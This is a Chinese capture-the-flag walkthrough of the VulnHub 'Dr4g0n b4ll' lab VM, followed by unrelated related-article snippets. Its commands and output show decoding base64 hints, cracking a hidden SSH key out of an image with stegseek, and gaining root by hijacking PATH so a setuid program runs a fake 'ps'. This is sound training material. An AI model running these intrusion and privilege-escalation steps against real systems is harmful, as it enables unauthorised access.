vulnhub ---- Dr4g0n b4ll

文章目录

  • 网段扫描
  • 隐藏目录
  • 隐写
  • 尝试通过ssh连接
  • 提权
  • 路径劫持

网段扫描

nmap -sn 命令用于执行主机存活扫描,仅检测目标网络中的活动主机,而不进行端口扫描。
┌──(root㉿kali)-[~/Downloads]
└─# nmap -sn 10.10.10.0/24                             
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 23:55 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00033s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:E8:39:64 (VMware)
Nmap scan report for 10.10.10.11
Host is up (0.00035s latency).
MAC Address: 00:0C:29:D1:8E:56 (VMware)
Nmap scan report for 10.10.10.240
Host is up (0.00032s latency).
MAC Address: 00:50:56:E4:2E:A9 (VMware)
Nmap scan report for 10.10.10.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.10 seconds

直接访问10.10.10.11,成功,是一篇写龙珠的文章
在这里插入图片描述
查看源代码,在最下面发现base64编码
在这里插入图片描述

┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d              
UkZKQlIwOU9JRUpCVEV3PQ==                                                                                        
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d
RFJBR09OIEJBTEw=                                                                                        
┌──(root㉿kali)-[~/Downloads]
└─# echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d| base64 -d
DRAGON BALL

访问robots.txt文件,敏感目录(即使没有目录扫描,也应该知道这个),也有一个base64编码
在这里插入图片描述

隐藏目录

在这里插入图片描述
提示:你要找到隐藏目录根据上面解码得到DRAGON BALL,联想到这是一个隐藏目录,访问
在这里插入图片描述
secret.txt中有十几个目录,但都访问不了
在这里插入图片描述

vulnhub文件夹中,有一张图片和一个登陆页面(登陆页面弱密码登陆不想,猜测图片有隐写)
在这里插入图片描述

隐写

在这里插入图片描述··

┌──(root㉿kali)-[~/Downloads]
└─# binwalk aj.jpg DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01┌──(root㉿kali)-[~/Downloads]
└─# exiftool aj.jpg                                      
ExifTool Version Number         : 12.49
File Name                       : aj.jpg
Directory                       : .
File Size                       : 75 kB
File Modification Date/Time     : 2021:01:05 06:09:29-05:00
File Access Date/Time           : 2024:03:15 00:10:18-04:00
File Inode Change Date/Time     : 2024:03:15 00:09:54-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 959
Image Height                    : 535
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 959x535
Megapixels                      : 0.513┌──(root㉿kali)-[~/Downloads]
└─# stegseek aj.jpg /usr/share/wordlists/rockyou.txt    
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek[i] Found passphrase: "love"           
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".

通过stegseek,爆破出aj.jpg中存在id_rsa(ssh密钥)文件
在这里插入图片描述

尝试通过ssh连接

猜测用户名是DRAGON ,root,admin都不行,回头看看

在这里插入图片描述
发现xmen这个名字,尝试
在这里插入图片描述
登陆成功
在这里插入图片描述

提权

在script目录中发现demo.c和shell可执行文件,通过执行shell文件发现,shell的源码就是demo.c,因为demo.c调用了ps,所以想到更改ps内的文件或创建一个ps文件,使得demo.c调用我创建的ps文件

en@debian:~$ ls
local.txt  script
xmen@debian:~$ cat local.txt 
your falg :192fb6275698b5ad9868c7afb62fd555xmen@debian:~$ cd script/
xmen@debian:~/script$ ls
demo.c  shell
xmen@debian:~/script$ cat demo.c 
#include<unistd.h>
void main()
{ setuid(0);setgid(0);system("ps");
}
xmen@debian:~/script$ ./shellPID TTY          TIME CMD1176 pts/1    00:00:00 shell1177 pts/1    00:00:00 sh1178 pts/1    00:00:00 ps

路径劫持

首先创建ps,写入/bin/bash,当root用户执行时,就会创建一个root的交互页面,加权限,which ps发现ps是在/usr/bin下,echo $PATH输出环境变量路径,export PATH=.:$PATH将当前目录加到环境变量前,在进行echo $PATH,发现添加成功,which ps,调用ps时,会执行当前目录的ps文件,./script/shell 执行脚本,拿root权限

xmen@debian:~/script$ cd ../
xmen@debian:~$ echo "/bin/bash" >ps
xmen@debian:~$ chmod +x ps
xmen@debian:~$ ls
local.txt  ps  script
xmen@debian:~$ which ps
/usr/bin/ps
xmen@debian:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
xmen@debian:~$ export PATH=.:$PATH
xmen@debian:~$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
xmen@debian:~$ which ps
./ps
xmen@debian:~$ ./script/shell 
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(xmen)
root@debian:~# cd /root
root@debian:/root# ls
proof.txt
root@debian:/root# cat proof.txt_____ __________                                         /     \\______   \          ___  ___ _____   ____   ____  /  \ /  \|       _/          \  \/  //     \_/ __ \ /    \ 
/    Y    \    |   \           >    <|  Y Y  \  ___/|   |  \
\____|__  /____|_  /__________/__/\_ \__|_|  /\___  >___|  /\/       \/_____/_____/     \/     \/     \/     \/       join channel:   https://t.me/joinchat/St01KnXzcGeWMKSCyour flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/752801.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

计算机网络——物理层(宽带接入技术)

计算机网络——物理层&#xff08;宽带接入技术&#xff09; 什么是宽带有线带宽接入xDSLADSL 技术ADSL 的大部分组成 光纤同轴混合网&#xff08;HFC 网&#xff09;机顶盒与电缆调制解调器&#xff08;set-top box&#xff09; FTTx 技术光配线网 ODN (Optical Distribution …

nginx 基本使用、借助 nginx 和 mkcert 实现本地 https://localhost 测试。

CSDN 如何将资源设置为免费&#xff1f; 安装和基本使用 进入 nginx 官网 下载 Mainline version 版本 解压到一个你喜欢的位置&#xff0c;比如解压到 C: 目录 不管配不配置环境变量&#xff0c;对 nginx 的所有操作都应该在对应文件夹中 基本命令的使用&#xff1a; cd …

性能测试 事务 -- HPE Virtual User Generator -Web -HTTP/HTML

软件介绍 Virtual User Generator &#xff0c;记录用户流程并创建一个自动化性能测试脚本 Controller&#xff0c;单一控制点&#xff0c;轻松、有效地控制所有Vuser&#xff0c;执行期间监控场景性能 Analysis&#xff0c;生成性能测试报告&#xff0c;以图表形式呈现。 操…

2024图表分析网页模版大数据可视化大屏电子沙盘合集包含金融行业智慧大厅智慧交通智慧门店智慧物流智慧小区

2024图表分析网页模版大数据可视化大屏电子沙盘合集包含金融行业智慧大厅智慧交通智慧门店智慧物流智慧小区 项目介绍&#xff1a; 图表分析网页模版 大数据可视化大屏电子沙盘合集&#xff0c;项目基于html/css/js&#xff0c;包含行业&#xff1a; 智慧政务 智慧社区 金融行…

mysql 更新时,旧值与新值相同会怎么做?

文章目录 1 问题描述2 验证2.1 验证猜想12.2 验证猜想2 3 结论4 mysql 为什么这么设计呢&#xff1f; 1 问题描述 创建一张表t&#xff0c;插入一行数据 mysql> CREATE TABLE t ( id int(11) NOT NULL primary key auto_increment, a int(11) DEFAULT NULL ) ENGINEInnoDB…

第111讲:Mycat实践指南:固定Hash算法分片下的水平分表详解

文章目录 1.固定Hash算法分片的概念1.1.固定Hash算法的概念1.2.固定Hash算法是如何将数据路由到分片节点的 2.使用固定Hash算法分片对某张表进行水平拆分2.1.在所有的分片节点中创建表结构2.2.配置Mycat实现固定Hash算法分片的水平分表2.2.1.配置Schema配置文件2.2.2.配置Rule分…

unityprotobuf自动生成C#

Release Protocol Buffers v3.19.4 protocolbuffers/protobuf GitHub 导入Source code 里面的 csharp/src/Google.Protobuf 进入Unity 拷贝其他版本的 System.Runtime.CompilerServices.Unsafe进入工程 使用protoc-3.19.4-win32 里面的exe去编译proto文件为C# using Sys…

MybatisPlus-Generator自定义模版生成CRUD、DTO、VO、Convert等

个人博客&#xff1a;无奈何杨&#xff08;wnhyang&#xff09; 个人语雀&#xff1a;wnhyang 共享语雀&#xff1a;在线知识共享 Github&#xff1a;wnhyang - Overview 简介 如标题所言&#xff0c;本篇文章介绍如何使用MybatisPlus-Generator自定义模版生成CRUD、DTO、V…

Redis实战——查询缓存缓存穿透、雪崩、击穿

目录 为什么要使用缓存缓存的作用缓存的成本如何使用缓存缓存模型和思路缓存更新策略数据库和缓存不一致解决方案数据库和缓存不一致采用什么方案对比删除缓存与更新缓存如何保证缓存与数据库的操作同时成功/同时失败先操作缓存还是先操作数据库&#xff1f; 实现商铺缓存与数据…

Tensorflow笔记(二):激活函数、优化器等、神经网络模型实现(商品销量预测)

import tensorflow as tf import numpy as np from tqdm import tqdm# ----------------------------- tensor常用函数2 ----------------------------------- a tf.constant([1, 2, 3, 1, 2]) b tf.constant([0, 1, 3, 4, 5]) c tf.where(tf.greater(a, b), a, b) # 若a&g…

Linux下的多线程编程:原理、工具及应用(4)

&#x1f3ac;慕斯主页&#xff1a;修仙—别有洞天 ♈️今日夜电波&#xff1a;Flower of Life—陽花 0:34━━━━━━️&#x1f49f;──────── 4:46 &#x1f504; ◀️ ⏸ ▶️ ☰ …

RuoYi-Vue开源项目2-前端登录验证码生成过程分析

前端登录验证码实现过程 生成过程分析 生成过程分析 验证码的生成过程简单概括为&#xff1a;前端登录页面加载时&#xff0c;向后端发送一个请求&#xff0c;返回验证码图片给前端页面展示 前端页面加载触发代码&#xff1a; import { getCodeImg } from "/api/login&q…

Spring6--基础概念

1. 概述 1.1. Spring是什么 Spring 是一套广泛应用于 Java 企业级应用开发领域的轻量级开源框架&#xff0c;由 Rod Johnson 创立&#xff0c;旨在显著降低 Java 企业应用的复杂性&#xff0c;缩短开发周期&#xff0c;并提升开发效率。Spring 不仅适用于服务器端开发&#x…

三个案例,带你看懂智能时代支撑降本增效的底层逻辑

2003年&#xff0c;“神舟五号”成功登上太空&#xff0c;2007年&#xff0c;乔布斯初代苹果发布会&#xff0c;2016年“天宫二号”与“神州十一号”自动交会对接成功&#xff0c;2022年ChatGPT横空出市。 科技发展速度令人惊叹&#xff0c;一不留神就步入了下一个科技时代&am…

【vue elementUI】el-select和弹出框el-option样式调整,::v-deep失效

组件自带样式&#xff1a; 修改后样式&#xff1a; 注意修改弹出框样式需要修改一个属性&#xff1a; 此属性默认值为true&#xff0c;此时可以看到弹出框是放在外面的&#xff0c;没有在el-select里面。此时设置弹窗样式会不生效&#xff0c;::v-deep无效。 需要将此属性改为f…

JavaScript练手小技巧:数字反转时钟

样式基于博主的这篇文章&#xff1a; CSS3技巧38&#xff1a;3D 翻转数字效果-CSDN博客 既然可以实现翻转数字了&#xff0c;肯定就可以跟 JS 相结合去完成一些数字展示效果。 比如&#xff0c;数字反转时钟。 为了方便&#xff0c;所有 HTML 数字根据时间动态生成。因此&a…

vue3 element plus 上传下载

文章目录 上传下载 上传 /* html */ <el-upload v-model"fileId" class"avatar-uploader" ref"exampleUploadRef" :file-list"fileList" :show-file-list"false" action"/ys-three-year/ThreeReport/uploadFile&q…

Coarse-to-Fine Latent Diffusion for Pose-Guided Person Image Synthesis阅读笔记

连更&#xff01;&#xff01; 0 Abstract 先前的姿势引导图像合成方法简单的将人的外观与目标姿势进行对齐&#xff0c;这容易导致过拟合&#xff0c;因为缺乏对source person image的high-level semantic understanding&#xff1b;文章开发了一种新的训练范式&#xff1a;…

mudo服务器测试一

目录 长连接测试 测试代码 客户端 服务端 超时连接测试 测试代码 客户端 服务端 错误请求测试 测试代码 场景一 客户端 服务端 场景二 客户端 服务端 长连接测试 测试代码 /*长连接测试1: 创建一个客户端持续给服务器发送数据,直到超过时间看是否正常*/ #inc…

实用工具推荐----geek 卸载软件的神器

Geek Uninstaller 是一款软件卸载工具。它提供简单易用的界面和强大的卸载功能&#xff0c;能快速扫描和识别应用程序&#xff0c;并彻底删除与之相关的文件和注册表项&#xff0c;确保完全清除应用程序。它还可以监视应用程序安装过程&#xff0c;并记录创建的文件和注册表项…